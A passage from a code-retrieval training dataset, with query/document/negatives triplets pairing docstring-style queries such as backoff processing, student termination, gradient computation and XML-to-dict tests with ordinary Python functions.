method, transID = transID )\n if not res['OK']:\n self._logError( \"Failed to update DB after task submission: %s\" % res['Message'],\n transID = transID, method = method )\n return res\n\n return S_OK()",
"def process_subset_tasks(self, subset_tasks):\n jobs = [\n self.queue.enqueue(\n self.subsetter.process_task,\n job_timeout=DEFAULT_TIMEOUT,\n result_ttl=DEFAULT_TIMEOUT,\n ttl=DEFAULT_TIMEOUT,\n **task\n )\n for task in subset_tasks\n ]\n return self.wait_for(jobs)",
"def submit_batch(self, command):\n pass",
"def submit_all(self: SubmitApp) -> None:\n self.count = submit_from(self.source, template=self.template,\n bundlesize=self.bundlesize, bundlewait=self.bundlewait,\n tags=Tag.parse_cmdline_list(self.taglist))",
"def run(self, local_project):\n # Walks project adding project/folder to small_item_task_builder and adding files to small_files/large_files\n ProjectWalker.walk_project(local_project, self)\n\n self.sort_files_list(self.small_files)\n self.add_small_files_to_task_builder()\n # Run small items in parallel\n self.runner.run()\n\n # Run parts of each large item in parallel\n self.sort_files_list(self.large_files)\n self.upload_large_files()",
"def process_batch(self, urls, extra_headers=None):\n\n # cull out ones we've got\n n_before = len(urls)\n urls = [url for url in urls if not self.store.already_got(url)]\n logging.info(\"processing %d urls (%d are new)\", n_before, len(urls))\n\n err_cnt = 0\n try:\n\n for url in urls:\n try:\n logging.debug(\"fetch %s\",url)\n headers = {}\n headers.update(self.headers)\n if extra_headers:\n headers.update(extra_headers)\n response = requests.get(url, headers=headers)\n\n # TODO: maybe just skip ones which redirect to other domains?\n if response.url != url:\n if self.disallow_redirects == True:\n logging.warning(\"Skipping %s because it redirected to %s\", url, response.url)\n continue\n elif self.require_same_domain == True:\n orig_location = urlparse.urlparse(url)\n new_location = urlparse.urlparse(response.url)\n if orig_location.netloc != new_location.netloc:\n logging.warning(\"Skipping %s because it redirected to another domain: %s\", url, response.url)\n continue\n\n press_release = self.extract(response.text, url)\n\n # encode text fields\n # TODO: use isinstance(...,unicode) instead\n for f in ('url','title','source','text','location','language','topics'):\n if f in press_release:\n press_release[f] = press_release[f].encode('utf-8')\n self.store.add(press_release)\n \n except Exception as e:\n logging.error(\"failed on %s: %s %s\",url,e.__class__,e)\n print traceback.print_exc()\n err_cnt += 1\n finally:\n self.store.save()",
"def task_list(self):\n self.developed_model_version_id = new_models(self.old_developed_model_version_id,\n db_connection=self.db_connection,\n gbd_round_id=self.gbd_round_id,\n decomp_step_id=self.decomp_step_id,\n desc=self.description + ' previous version {}'.\n format(self.old_developed_model_version_id))[0]\n self.developed_task = CODEmTask(model_version_id=self.developed_model_version_id,\n db_connection=self.db_connection,\n gbd_round_id=self.gbd_round_id,\n parameter_dict=self.codem_params,\n cores=self.num_cores)\n self.global_model_version_id = new_models(self.old_global_model_version_id,\n db_connection=self.db_connection,\n gbd_round_id=self.gbd_round_id,\n decomp_step_id=self.decomp_step_id,\n desc=self.description + ' previous version {}'.\n format(self.old_global_model_version_id))[0]\n self.global_task = CODEmTask(model_version_id=self.global_model_version_id,\n db_connection=self.db_connection,\n gbd_round_id=self.gbd_round_id,\n parameter_dict=self.codem_params,\n cores=self.num_cores)\n self.hybrid_task = HybridTask(user=self.user,\n developed_model_version_id=self.developed_model_version_id,\n global_model_version_id=self.global_model_version_id,\n conn_def=self.conn_def,\n upstream_tasks=[self.developed_task,\n self.global_task],\n parameter_dict=self.hybridizer_params)\n return [self.developed_task, self.global_task, self.hybrid_task]",
"def run_tasks(stdout):\n tasks = Task.objects.filter(time__lte=timezone.now() + timedelta(minutes=30), active=True)\n stdout.write(\"Working on {} tasks\".format(len(tasks)))\n for task in tasks.all():\n status = execute_task(task)\n if status == \"OK\":\n task.active = False\n task.save()\n Report.objects.create(task=task, status=0, success=True, text=status)\n else:\n Report.objects.create(task=task, status=-1, success=False, text=status)\n stdout.write(status)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Like process_data, but with exponential backoff.
|
def process_data_with_backoff(
timeout_seconds=DEFAULT_PROCESSING_TIMEOUT_SECONDS,
max_tasks=DEFAULT_MAX_TASKS):
results = utils.run_with_backoff(
func=process_data,
runtime=timeout_seconds,
max_tasks=max_tasks,
allow_transient_errors=True)
for result in results:
if result is not False and 'error' in result:
logging.error('Microversion failed (will retry): %s - %s',
                    result['path'], result['error'])
return results
|
[
"def _procces_in_batch(self) -> None:\n if not self._handler:\n raise HandlerNotSet()\n\n start_at = time.time()\n buffer = self._wait_buffer_ready()\n elapsed_time = time.time() - start_at\n\n # When _wait_for_ready_buffer is stopped buffer could be empty\n # avoid calling process_batch() with empty list.\n if not buffer:\n return\n\n buffer_size = len(buffer)\n\n try:\n input_data = buffer.get_inputs()\n\n start_at = time.time()\n batch_output = self._handler(input_data)\n elapsed_time = time.time() - start_at\n\n output_size = len(batch_output)\n\n if buffer_size != output_size:\n # This exception is going to be set in every DataRequest\n raise BadBatchOutputSize(buffer_size, output_size)\n\n except Exception as ex:\n logger.warning(\"An exception occurs processing %s inputs\", buffer_size)\n buffer.set_exception(ex)\n else:\n buffer.set_outputs(batch_output)\n\n logger.debug(\"Process %s elements in %s seconds\", buffer_size, elapsed_time)",
"def batch_job(self, function, batch, **kwargs):\n rate_limit = kwargs.get('limit', 100)\n timeout = kwargs.get('timeout', 0)\n count = 0\n response = []\n for item in batch:\n response.append(function(item))\n count += 1\n if count % rate_limit == 0:\n print(f\"{count} calls have been processed. Timing out for {timeout} minute(s) in order to stay under the rate limit\")\n time.sleep(timeout)\n return response",
"def retry_request_historical_data(context, data):\r\n retry = 3 # Retry 3 times and give up\r\n count = 1 # The number of the current try\r\n ans = None # Retrieved hist if the action is successful.\r\n while count <= retry:\r\n count += 1\r\n try:\r\n # Invoke request_historical_data to retrieve historical data from server\r\n ans = request_historical_data(context.sec, '1 Day', '5 D', endTime=pytz.utc.localize(dt.datetime.utcnow()))\r\n break\r\n except RuntimeError:\r\n # Sleep 3 seconds and try it again\r\n time.sleep(3)\r\n return ans",
"def process_data(self, data):\n for line in self.buffer.process_data(data):\n try:\n self.process_line(line)\n except Exception as e:\n on_exception.send(self, e=e)",
"def test_backoff(self):\n r = retrying.retry(wait_exponential_multiplier=1000)(fail_n(9))\n\n fake_time = FakeTime()\n with fake_time:\n r()\n self.assertGreaterEqual(fake_time.mock_sleep.total, 2**9 - 1)",
"def _process_data_events(self):\n self.channel.basic_consume(self._on_response, no_ack=True,\n queue=self.callback_queue)\n while True:\n with self.internal_lock:\n self.connection.process_data_events()\n time.sleep(0.1)",
"def _backoff(self, ngram):\n return self.model[ngram][0][1]",
"def process(self, data, **kwargs):\n # sequentially process the data\n for processor in self.processors:\n data = _process((processor, data, kwargs))\n return data",
"def retry(func, max_time, *args, **kwargs):\n\n jitter = Jitter()\n time_passed = 0\n while True:\n try:\n return func(*args, **kwargs)\n except AmpliumException:\n if time_passed < max_time:\n time_passed = jitter.backoff()\n else:\n raise",
"def process_data(self, iterator, start_val=0, max_vals=None, **kwargs):\n raise Exception(\"Unimplemented Function\")",
"def wrap(self, awsfunc, *args, **nargs):\n attempts = 0\n\n while True:\n attempts = attempts + 1\n try:\n if self.rate_limit_delay > 0:\n time.sleep(self.rate_limit_delay)\n\n retval = awsfunc(*args, **nargs)\n\n if self.rate_limit_delay > 0:\n self.rate_limit_delay = self.rate_limit_delay / 2\n\n return retval\n\n except BotoServerError as e:\n if e.error_code == 'Throttling':\n if self.rate_limit_delay == 0:\n self.rate_limit_delay = 1\n sys.stderr.write('rate-limited: attempt %d\\n' %\n attempts)\n elif self.rate_limit_delay < self.rate_limit_maxdelay:\n self.rate_limit_delay = self.rate_limit_delay * 2\n sys.stderr.write('rate-limited: attempt %d\\n' %\n attempts)\n else:\n raise e\n\n elif e.error_code == 'ServiceUnavailable':\n if self.rate_limit_delay == 0:\n self.rate_limit_delay = 1\n sys.stderr.write('api-unavailable: attempt %d\\n' %\n attempts)\n elif self.rate_limit_delay < self.rate_limit_maxdelay:\n self.rate_limit_delay = self.rate_limit_delay * 2\n sys.stderr.write('api-unavailable: attempt %d\\n' %\n attempts)\n else:\n raise e\n else:\n raise e",
"def _wait_for_data(self):\r\n raise NotImplementedError",
"def process(self, data, **kwargs):\n # if only a single processor is given, there's no need to map()\n if len(self.processors) == 1:\n return [_process((self.processors[0], data, kwargs))]\n # process data in parallel and return a list with processed data\n return list(self.map(_process, zip(self.processors, it.repeat(data),\n it.repeat(kwargs))))",
"def process(self, data, **kwargs):\n if self.online:\n return self.process_online(data, **kwargs)\n return self.process_offline(data, **kwargs)",
"def _predict_batch_worker(self):\n while True:\n ready = connection.wait(self.return_policy_value,timeout=0.001)\n if not ready:\n continue\n data, result_pipes = [], []\n for pipe in ready:\n while pipe.poll():\n data.append(pipe.recv())\n result_pipes.append(pipe)\n\n data = np.asarray(data, dtype=np.float32)\n # print (data.shape)\n \n policy_array, value_array = self.model.predict_on_batch(data)\n # print (policy_array, value_array)\n for pipe, policy, value in zip(result_pipes, policy_array, value_array):\n pipe.send((policy, float(value)))",
"def retry( # noqa: C901\n attempts: int = 3,\n delay: t.Union[int, float] = 0.5,\n max_delay: t.Union[int, float] = 150.0,\n scale: t.Union[int, float] = 2.0,\n jitter: t.Union[int, float, t.Tuple[t.Union[int, float], t.Union[int, float]]] = 0,\n exceptions: t.Iterable[Type[Exception]] = (Exception,),\n on_exception: t.Union[t.Callable[[Exception, int], t.Any], None] = None,\n) -> t.Callable[[CallableT], CallableT]:\n if not isinstance(attempts, int) or attempts <= 0:\n raise ValueError(\"attempts must be an integer greater than 0\")\n\n if not isinstance(delay, NUMBER_TYPES) or delay < 0:\n raise ValueError(\"delay must be a number greater than or equal to 0\")\n\n if not isinstance(max_delay, NUMBER_TYPES) or max_delay < 0:\n raise ValueError(\"scale must be a number greater than or equal to 0\")\n\n if not isinstance(scale, NUMBER_TYPES) or scale <= 0:\n raise ValueError(\"scale must be a number greater than 0\")\n\n if (\n not isinstance(jitter, NUMBER_TYPES + (tuple,))\n or (isinstance(jitter, NUMBER_TYPES) and jitter < 0)\n or (\n isinstance(jitter, tuple)\n and (len(jitter) != 2 or not all(isinstance(jit, NUMBER_TYPES) for jit in jitter))\n )\n ):\n raise ValueError(\"jitter must be a number greater than 0 or a 2-item tuple of \" \"numbers\")\n\n if not isinstance(exceptions, tuple) or not all(\n issubclass(exc, Exception) for exc in exceptions\n ):\n raise TypeError(\"exceptions must be a tuple of Exception types\")\n\n if on_exception and not callable(on_exception):\n raise TypeError(\"on_exception must be a callable\")\n\n if jitter and not isinstance(jitter, tuple):\n jitter = (0, jitter)\n\n on_exc_argcount = getargcount(on_exception, maxargs=2) if on_exception else None\n\n def decorator(func):\n @wraps(func)\n def decorated(*args, **kwargs):\n delay_time = delay\n\n for attempt in range(1, attempts + 1):\n # pylint: disable=catching-non-exception\n try:\n return func(*args, **kwargs)\n except exceptions as exc:\n if on_exception:\n callit(on_exception, exc, attempt, argcount=on_exc_argcount)\n\n if attempt == attempts:\n raise\n\n if jitter:\n delay_time += max(0, random(*jitter))\n\n if delay_time < 0: # pragma: no cover\n continue\n\n if max_delay:\n delay_time = min(delay_time, max_delay)\n\n time.sleep(delay_time)\n\n # Scale after first iteration.\n delay_time *= scale\n\n return decorated\n\n return decorator",
"def unpack_data(self, usnap=.2): # 2/10th second sleep between empty requests\n for new_data in self.socket:\n if new_data:\n self.data_stream.unpack(new_data)\n else:\n sleep(usnap) # Sleep in seconds after an empty look up.",
"def _bump_backoff(self):\n self.backoff_time = min(self.max_backoff, 2*(self.backoff_time or 1))",
"async def handle_rate_limit(self, response, request) -> \"httpx.Response\":\n while response.status_code == 429:\n errors = response.json()\n if not response.headers.get(\"Via\"):\n raise HTTPException(errors)\n wh_sleep = float(errors[\"retry_after\"]) + 0.15\n logger.error(\n \"Webhook rate limited: sleeping for {wh_sleep} seconds...\".format(\n wh_sleep=round(wh_sleep, 2)\n )\n )\n await asyncio.sleep(wh_sleep)\n response = await request()\n if response.status_code in [200, 204]:\n return response"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
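A minimal sketch of the kind of exponential-backoff runner the record above relies on. The real utils.run_with_backoff is not shown here, so its name, the runtime/max_tasks/allow_transient_errors parameters, and the jittered-sleep policy below are assumptions rather than its actual API:

import logging
import random
import time

def run_with_backoff(func, runtime, max_tasks, allow_transient_errors=True,
                     base_delay=0.5, max_delay=30.0):
    # Call func repeatedly until the time budget or the task budget is spent,
    # sleeping with exponentially growing, jittered delays after failures.
    deadline = time.time() + runtime
    delay = base_delay
    results = []
    for _ in range(max_tasks):
        if time.time() >= deadline:
            break
        try:
            results.append(func())
            delay = base_delay  # reset the delay after a success
        except Exception as exc:
            if not allow_transient_errors:
                raise
            logging.warning("transient error, retrying in %.1fs: %s", delay, exc)
            time.sleep(delay + random.uniform(0, delay))  # jittered backoff
            delay = min(delay * 2, max_delay)  # exponential growth, capped
    return results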
Method to terminate a student and change the state to terminate.
|
def save_terminate(self):
student_rec = self.env["student.student"].browse(
self._context.get("active_id")
)
student_rec.write(
{
"state": "terminate",
"terminate_reason": self.reason,
"active": False,
}
)
student_rec.standard_id._compute_total_student()
for rec in self.env["student.reminder"].search(
[("stu_id", "=", student_rec.id)]
):
rec.active = False
if student_rec.user_id:
student_rec.user_id.active = False
|
[
"def terminate(self):\n self.clear_current_data()\n self.terminated = True",
"def terminate(self) -> None:\r\n self.__state__ = JobState.TERMINATE\r\n log_to_console(self.get_echo())",
"def save_terminate(self):\n student_obj = self.env['student.student'\n ].browse(self._context.get('active_id'))\n event_regi = self.env['school.event.registration'\n ].search([('part_name_id', '=', student_obj.id)])\n if event_regi:\n event_regi.write({'state': 'cancel'})\n event_participant = self.env['school.event.participant'\n ].search([('name', '=', student_obj.id)])\n if event_participant:\n event_participant.unlink()\n return super(TerminateReasonEvent, self).save_terminate()",
"def terminate(self):\n self._logger.info(\n \"Terminate signaled to trainer. Training will stop after current epoch is finished\")\n self.should_terminate = True",
"def clear_student_state(self, *args, **kwargs):\n # pylint: disable=unused-argument\n student_id = kwargs['user_id']\n for submission in submissions_api.get_submissions(\n self.get_student_item_dict(student_id)\n ):\n submission_file_sha1 = submission['answer'].get('sha1')\n submission_filename = submission['answer'].get('filename')\n submission_file_path = self.file_storage_path(submission_file_sha1, submission_filename)\n if default_storage.exists(submission_file_path):\n default_storage.delete(submission_file_path)\n submissions_api.reset_score(\n student_id,\n self.block_course_id,\n self.block_id,\n clear_state=True\n )",
"def _stopping(self):\n \n self.__state = runlevel.STATE_STOPPING",
"def terminate(self):\n\n if not self.job_id:\n raise RankmaniacError('No job is running.')\n\n self._emr_conn.terminate_jobflow(self.job_id)\n self.job_id = None\n\n self._reset()",
"def halt(self):\n self.running = False\n sys.exit(0)",
"def expell(self) -> None:\n super().__del__()\n Person.students -= 1\n print(f'The {self} has been expelled')",
"def end_student_group(self, date, student_group, classname):\n the_history = self.get_student_group_history(classname)\n the_history.end_multiactive_entry(date, student_group, None)",
"def exit_mode(state):\n state.exit_mode()",
"def __callDelStudent(self):\r\n idGiven=input(\" Give student's ID:\")\r\n try:\r\n st=self.__lista.delStudent(idGiven)\r\n self.__notes.delStudentNote(st)\r\n print(\"Student \" +st.getName() +\" has been removed from the catalog.\")\r\n except IdNotFound as ex:\r\n print(ex.getErrors())\r\n except RepositoryError() as ex:\r\n print(ex.getErrors())",
"def halt(self):\n self.__global_state = DFAGlobalState.HALT",
"def stop(self):\n\n self.active = False\n self.join()",
"def _stop_check_state(self, session, params):\n session.set_status('stopping')",
"def exit_state(self):\n self.change_state(StateIDs.SELECT_CHARACTER)",
"def setTerminating(self, name):\n try:\n state = self._states[name]\n except:\n raise ValueError(\"Undefined terminating state '\" + name + \"'\", 5)\n\n state.setTerm(True)",
"def exit(self):\n LOGGER.debug(\"State 'init' exited\")",
"def exit(self):\n\n clearTerminal()\n quitting = True\n if self._modified:\n print('You have made unsaved changes to the ' + self._plural + '. Are you sure you want to exit without saving?\\n')\n quitting = getConfirmation()\n\n if quitting:\n self._running = False\n print('Have a nice day.\\n')"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Calculate the gradient of input samples.
|
def _gradient(self, inputs, labels):
sens = Tensor(np.array([1.0], inputs.dtype))
# get grad of loss over x
out_grad = self._loss_grad(Tensor(inputs), Tensor(labels), sens)
if isinstance(out_grad, tuple):
out_grad = out_grad[0]
gradient = out_grad.asnumpy()
if self._is_targeted:
gradient = -gradient
return normalize_value(gradient, self._norm_level)
|
[
"def gradient(x):\n\t\tpass",
"def _gradient(self, _x, _y):\n ### YOUR CODE HERE\n dl_dwx = self.softmax(_x) - _y\n dl_dx = np.matmul(_x.reshape(self.n_features,1), dl_dwx.reshape(1,self.k))\n _g = dl_dx\n return _g\n ### END YOUR CODE",
"def grad_input(self, x):\n # Compute the gradient of the mean function.\n d_kernel = self.kernel.grad_input(x, self.X)\n d_mean = d_kernel.T.dot(self.alpha)\n # Compute the gradient of the standard deviation function. It is\n # absolutely crucial to note that the predict method returns the\n # variance, not the standard deviation, of the prediction.\n sd = np.sqrt(self.predict(x)[1])\n K_cross = self.kernel.cov(x, self.X)\n M = spla.cho_solve((self.L, True), K_cross.T).ravel()\n d_sd = -d_kernel.T.dot(M) / sd\n return d_mean, d_sd",
"def compute_gradient(self, model, x, y):\n\t\tpass",
"def calc_gradient(self, X_train, y_train):\n scores = np.dot(X_train, self.w)\n correct_scores = np.choose(y_train, scores.T)\n\n margins = np.maximum(0, (scores.T - correct_scores + 1)).T\n for i in range(len(margins)):\n margins[i][y_train[i]] = 0\n\n hinge_loss = np.sum(margins)\n reg_loss = 0.5 * self.reg_const * np.sum(self.w ** 2)\n loss = reg_loss + hinge_loss / self.batch_size\n\n margins_grad = margins\n margins_grad[margins > 0] = 1\n false_counts = np.sum(margins_grad, axis=1)\n for i in range(len(margins)):\n margins[i][y_train[i]] -= false_counts[i]\n\n grad = np.dot(X_train.T, margins_grad)\n grad /= self.batch_size\n grad += self.reg_const * self.w\n\n return grad, loss",
"def gradient(self, param_values: np.ndarray) -> np.ndarray:\n raise NotImplementedError",
"def gradient(self, point):\n gradient = np.zeros((self.dimension(),), dtype='float')\n for j in range(len(self.sample)):\n delta_y = point[1]-self.sample[j][1]\n delta_x = point[0]-self.sample[j][0]\n partial_x = -delta_y/(delta_x**2+delta_y**2)\n partial_y = delta_x/(delta_x**2+delta_y**2)\n gradient[0] -= error(self.sample[j], point)*partial_x\n gradient[1] -= error(self.sample[j], point)*partial_y\n return gradient",
"def gradient(self):\n gx, gy = np.gradient(self.zz)\n return gx, gy",
"def _calculate_trainable_parameters_gradient(self, input, backwards_input):\n pass",
"def compute_grad(X, y, w):\n m = X.shape[0]\n A = probability(X, w)\n dZ = A - y\n #cost = compute_loss(\n dW = np.dot(dZ, X) / float(m)\n \n return dW",
"def f_grad(self, x):\n gradient = []\n\n for key in self.mean_functions:\n gradient.push(self.mean_functions[key][1](x))\n\n return np.array(gradient)",
"def compute_gradients(self,loss):\n\t\tgrads = T.grad(loss, self.rnn.params)\n\t\treturn zip(self.rnn.params, grads)",
"def calc_gradient_at(self, x: np.ndarray) -> np.ndarray:\n return gradient_approximation(self.f, x)",
"def accumulate_gradients(self):\n for k in range(self.last_layer, -1, -1):\n self.g[k] = self.g[k] + np.matmul(self.d[k].T, self.a[k])",
"def compute_gradient(y, tx, w):\n # ***************************************************\n # INSERT YOUR CODE HERE\n # TODO: compute gradient vector\n # ***************************************************\n raise NotImplementedError",
"def GetGradient(self, x):\n return _handle.OperatorHandle_GetGradient(self, x)",
"def gradient(self, x, w=None):\n # Transform data using inner preprocess, if defined\n x, y = self._check_input(x)\n self._check_is_fitted()\n self._clear_cache()\n\n x_prc = self._forward_preprocess(x, caching=True)\n if self._grad_requires_forward:\n self._forward(x_prc) # this is called only if required\n return self.backward(w)",
"def calculate_gradients(self, wanted_outputs, actual_outputs):\n wanted_outputs = _to_numpy_column(wanted_outputs)\n actual_outputs = _to_numpy_column(actual_outputs)\n\n a = self.error.deltas(wanted_outputs, actual_outputs)\n b = self.activation.f_prime(self.v[-1])\n deltas = (a * b)\n\n gradients = list()\n for weights, y, v in reversed(zip(self.weights, self.y[:-1], self.v[:-1])):\n prev_y = np.vstack([1, y])\n prev_v = np.vstack([1, v])\n\n gradients.append(deltas * prev_y.T)\n assert gradients[-1].shape == weights.shape\n\n a = self.activation.f_prime(prev_v)\n b = weights.T.dot(deltas)\n deltas = (a * b)[1:]\n\n self._input_deltas = deltas\n return reversed(gradients)",
"def gradient(self, x, y_actual, args):\n weights = args[0]\n self.update_weights(weights)\n # Update zeroth layer\n self.layer0 = x.tolist()\n\n # Begin backtracking\n y = self.predict(x)\n grad_cache = np.zeros((self.num_units_per_layer, self.num_units_per_layer, 4))\n grad_cache.fill(0.0)\n\n # Find 3rd layer of derivatives\n for i in range(0, self.num_units_per_layer):\n grad_cache[i, 1, 3] = (y - y_actual) * self.layer2[i]\n\n # Find 2nd layer of derivatives\n for i in range(0, self.num_units_per_layer):\n for j in range(1, self.num_units_per_layer):\n grad_cache[i, j, 2] = grad_cache[j, 1, 3] * self.weights[j, 1, 3] * (1.0 - self.layer2[j]) * self.layer1[i]\n\n # Find 3rd layer of derivatives\n for i in range(0, x.shape[0]):\n for j in range(1, self.num_units_per_layer):\n grad_cache[i, j, 1] = x[i] * (1.0 - self.layer1[j]) * np.sum(np.multiply(self.weights[j, :, 2], grad_cache[j, :, 2]))\n\n return grad_cache"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
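The _gradient method above negates the gradient for targeted attacks and then hands it to normalize_value. A minimal numpy sketch of such a helper follows; the supported norm levels ("l1", "l2", "inf") and the per-sample flattening are assumptions about how the real function behaves:

import numpy as np

def normalize_value(gradient, norm_level="l2", eps=1e-12):
    # Normalize each sample's gradient by the requested norm; eps avoids
    # division by zero when a gradient is all zeros.
    flat = gradient.reshape(gradient.shape[0], -1)
    if norm_level in ("inf", np.inf):
        norm = np.max(np.abs(flat), axis=1, keepdims=True)
    elif norm_level in ("l1", 1):
        norm = np.sum(np.abs(flat), axis=1, keepdims=True)
    else:  # treat anything else as l2
        norm = np.sqrt(np.sum(flat ** 2, axis=1, keepdims=True))
    return (flat / (norm + eps)).reshape(gradient.shape)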
test conversion of xml string to dict
|
def test_xml_to_dict(self):
expected = self.data
result = convert.xml_to_dict(self.xml)
self.assertEqual(expected, result)
|
[
"def test_xmldict(self):\n xml = self.xml_data\n from_string = xmldict.xml_to_dict(xml)\n\n d = {'contact': {'fname': 'Joe', 'lname': 'Smith'},\n 'query': {'field': 'ass', 'where': 'ass'}}\n\n from_dict = xmldict.dict_to_xml(d)\n\n # print the dict created from xml string\n termprint('INFO', from_string)\n\n # print the xml string created from dict\n termprint('WARNING', from_dict)",
"def xml_str_to_dict(s):\n xml = minidom.parseString(s)\n return pythonzimbra.tools.xmlserializer.dom_to_dict(xml.firstChild)",
"def test_read_xml_string_to_dict_for_staff(self):\n staff_output = {}\n staff_tag = None\n for element, tag in read_xml_string(self.xml_string, records_tag=['staff'], to_dict=True):\n staff_output = element\n staff_tag = tag\n\n self.assertDictEqual(staff_output, self.expected_output)\n self.assertEqual(staff_tag, 'staff')",
"def parse_str_to_dict(self, data: str) -> OrderedDict:\n return xmltodict.parse(data)",
"def ConvertXmlToDict(root, dictclass=XmlDictObject):\r\n\r\n # If a string is passed in, try to open it as a file\r\n if isinstance(root, str):\r\n import io\r\n \r\n root = io.StringIO(root)\r\n root = ElementTree.parse(root).getroot()\r\n elif not ElementTree.iselement(root):\r\n print('Expected ElementTree.Element or file path string')\r\n\r\n return dictclass({root.tag: _ConvertXmlToDictRecurse(root, dictclass)})",
"def convert_xml_to_dict(root, dictclass=XmlDictObject):\n # If a string is passed in, try to open it as a file\n if isinstance(root, basestring):\n root = _try_parse(root)\n elif not isinstance(root, ETree.Element):\n raise TypeError('Expected ElementTree.Element or file path string')\n\n return dictclass({root.tag: _convert_xml_to_dict_recurse(root, dictclass)})",
"def test_xml_data_parser(self):\n data = utils.xml_data_parser()\n self.assertIsInstance(data, dict)\n self.assertIsInstance(data.keys()[0], int)\n self.assertEqual(\n data[141], {\n 'name': 'Adam P.',\n 'avatar': 'https://intranet.stxnext.pl/api/images/users/141'\n }\n )",
"def test_xml_exist(xml_parser):\n\n xml_data = xml_parser()\n assert xml_data.get_dict()",
"def test_simple_str_to_dict(self):\n d = msgmap.str_to_dict('k1:v1 k2:v2 k3:v3')\n self.assertEqual(len(d), 3)\n self.assertEqual(d.get('k1'), 'v1')\n self.assertEqual(d.get('k2'), 'v2')\n self.assertEqual(d.get('k3'), 'v3')",
"def test_read_xml_string_to_dict_for_operations_department(self):\n operations_department_output = {}\n operations_department_tag = None\n for element, tag in read_xml_string(self.xml_string, records_tag=['operations_department'], to_dict=True):\n operations_department_output = element\n operations_department_tag = tag\n\n self.assertDictEqual(operations_department_output, self.expected_output['operations_department'])\n self.assertEqual(operations_department_tag, 'operations_department')",
"def test_empty_str_to_dict(self):\n d = msgmap.str_to_dict('')\n self.assertEqual(len(d), 0)",
"def test_read_xml_string_to_dict_for_employees(self):\n employees_output = []\n\n for element, tag in read_xml_string(self.xml_string, records_tag=['employees'], to_dict=True):\n if tag == \"employees\":\n employees_output.append(element['bio'])\n\n self.assertListEqual(employees_output, self.expected_output['operations_department']['employees'])",
"def test_json_converter(self):\r\n result = json_processor.convert_json_to_dict(self.example_json_string)\r\n self.assertEqual(self.expected_output, result)",
"def test_xmlparser_deserialiser(self):\n sampletext = '\"Guido Rossum\", \"88 Palo Alto\", \"776985411\"' \n self.assertEqual(self.xmlo.deserialise(\"./test_input.xml\")[0].csv(), sampletext)\n return",
"def eval_xml(xml_string):\n result_dict = {}\n provisional_references_dict = {}\n # Parse XML string\n doc = ET.fromstring(xml_string)\n # List containing the relevant tags\n tags = ['doknr', 'ecli', 'gertyp', 'gerort', 'spruchkoerper', 'entsch-datum', 'aktenzeichen', 'doktyp', 'norm', 'vorinstanz', 'gruende', 'entscheidungsgruende', 'identifier', 'sonstlt', 'abwmeinung', 'tatbestand', 'tenor', 'sonstosatz', 'leitsatz', 'titelzeile', 'mitwirkung', 'region']\n tags_translation = {'doknr': 'documentnumber',\n 'ecli': 'ecli',\n 'gertyp': 'court',\n 'gerort': 'courtlocation',\n 'spruchkoerper': 'spruchkoerper',\n 'entsch-datum': 'date',\n 'aktenzeichen': 'filenumber',\n 'doktyp': 'documenttype',\n 'entscheidungsgruende': 'reasonfordecision',\n 'abwmeinung': 'abwmeinung',\n 'sonstosatz': 'miscsentence',\n 'norm': 'norms',\n 'vorinstanz': 'previouscourt',\n 'gruende': 'reasons',\n 'identifier': 'identifier',\n 'sonstlt': 'other',\n 'tatbestand': 'offense',\n 'tenor': 'tenor',\n 'leitsatz': 'keysentence',\n 'titelzeile': 'title',\n 'mitwirkung': 'mitwirkung',\n 'region': 'region'}\n\n # Load each tag into dictionary:\n\n outgoing_references_dict = {} # Contains additional information about where the references are\n outgoing_references_set = set() # Contains only the referenced filenumbers\n for tag in tags:\n tag_array = [] # Contains child-tags\n # Iterate through child tags of a tag:\n for child in doc.find(tag).iter():\n if child.text and child.text.rstrip() != \"\":\n if tag == 'entsch-datum':\n tag_array.append(int(child.text)) # Append child date to array as int\n else:\n tag_array.append(child.text.strip()) # Append child tag to array\n # If the array only contains one element, or the tag doesn't have child-tags,\n # only load that tag into the directory. Array is empty if there is no value inside the tag:\n if len(tag_array) == 1:\n if tag == 'vorinstanz':\n outgoing_references, outgoing_references_set = ref.find_reference(tag_array, outgoing_references_set)\n #outgoing_references_dict.append(outgoing_references)\n outgoing_references_dict[tag] = outgoing_references\n # Enter Data into the correct translated dict entry\n result_dict[tags_translation[tag]] = tag_array[0]\n else:\n # Specific tags require search for references\n # This path also enters any tags that are contained in arrays\n reference_tags = ['gruende', 'tenor', 'entscheidungsgruende', 'tatbestand', 'leitsatz', 'vorinstanz']\n if tag in reference_tags:\n outgoing_references, outgoing_references_set = ref.find_reference(tag_array, outgoing_references_set)\n # outgoing_references_dict.append(outgoing_references)\n outgoing_references_dict[tag] = outgoing_references #todo tags_translation?\n result_dict[tags_translation[tag]] = tag_array\n\n result_dict['keywords'] = []\n result_dict['incoming_count'] = -1\n result_dict['successful'] = \"\"\n\n # build provisional reference-dict for ES that does not contain incoming references yet:\n provisional_references_dict = create_reference_dict(result_dict['filenumber'], outgoing_references_dict, outgoing_references_set, [], result_dict['documentnumber'])\n # ES fields: [ID][filenumber][list outgoing references][set outgoing references][set incoming references]\n # [sum of incoming references]\n\n return result_dict, provisional_references_dict",
"def deserialize(self, str):",
"def test_manifest_parses(self):\n self.assertIsInstance(self.json, dict)",
"def test_string_roundtrip(self):\n block = self.create_block(\"leafwithdictandlist\")\n\n expected_seq = [b'1', b'2']\n expected_dict = {b'1': b'1', b'ping': b'ack'}\n block.sequence = expected_seq\n block.dictionary = expected_dict\n self.assertRaises(TypeError, self.export_xml_for_block, block)",
"def parseFromXml( self, sKey, sXML ):\n\t\tiBegin = 0\n\t\tiEnd = 0\n\t\tsXML = sXML.decode('utf8')\n\t\tiBegin = sXML.find( '<%s>' % sKey )\n\t\tif iBegin == -1:\n\t\t\treturn False\n\t\t\n\t\tiBegin += len( sKey ) + 2 # begin after the tag\n\t\tiEnd = sXML.find( '</%s>' % sKey )\n\t\tif iEnd == -1:\n\t\t\treturn False\n\t\t\n\t\tsResult = sXML[ iBegin : iEnd ].replace( '&', '&' )\n\t\treturn unicode(sResult)",
